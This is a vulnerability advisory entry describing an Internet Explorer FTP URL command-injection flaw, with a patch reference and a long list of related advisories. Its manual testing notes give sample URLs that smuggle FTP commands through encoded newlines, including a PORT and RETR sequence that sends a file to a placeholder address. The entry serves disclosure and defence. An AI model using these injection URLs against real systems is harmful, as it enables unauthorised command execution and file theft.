Microsoft IE FTP URL Arbitrary Command Injection

2004-12-06T09:07:28
ID OSVDB:12299
Type osvdb
Reporter Albert Puigsech Galicia(ripe@7a69ezine.org)
Modified 2004-12-06T09:07:28

Description

Vulnerability Description

Internet Explorer contains a flaw that will allow an attacker to inject arbitrary FTP commands. The problem is that the Internet Explorer URL FTP request is not verified properly and will allow an attacker to inject or manipulate FTP commands, resulting in a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

Short Description

Internet Explorer contains a flaw that will allow an attacker to inject arbitrary FTP commands. The problem is that the Internet Explorer URL FTP request is not verified properly and will allow an attacker to inject or manipulate FTP commands, resulting in a loss of integrity.

Manual Testing Notes

ftp://ftpuser:ftppass@victim/directory ftp://ftpuser:ftppass@victim/directory%0asomecommand%0a ftp://[victim]/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

References:

Security Tracker: 1012444 Secunia Advisory ID:13404 Secunia Advisory ID:21396 Related OSVDB ID: 27852 Related OSVDB ID: 27851 Related OSVDB ID: 27853 Related OSVDB ID: 27850 Related OSVDB ID: 27854 Related OSVDB ID: 27855 Other Advisory URL: http://www.7a69ezine.org/node/view/168 Microsoft Security Bulletin: MS06-042 Microsoft Knowledge Base Article: 918899 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0076.html Keyword: 7a69ezine Advisories 7a69Adv#15 ISS X-Force ID: 18384 FrSIRT Advisory: ADV-2006-3212 CVE-2004-1166 Bugtraq ID: 11826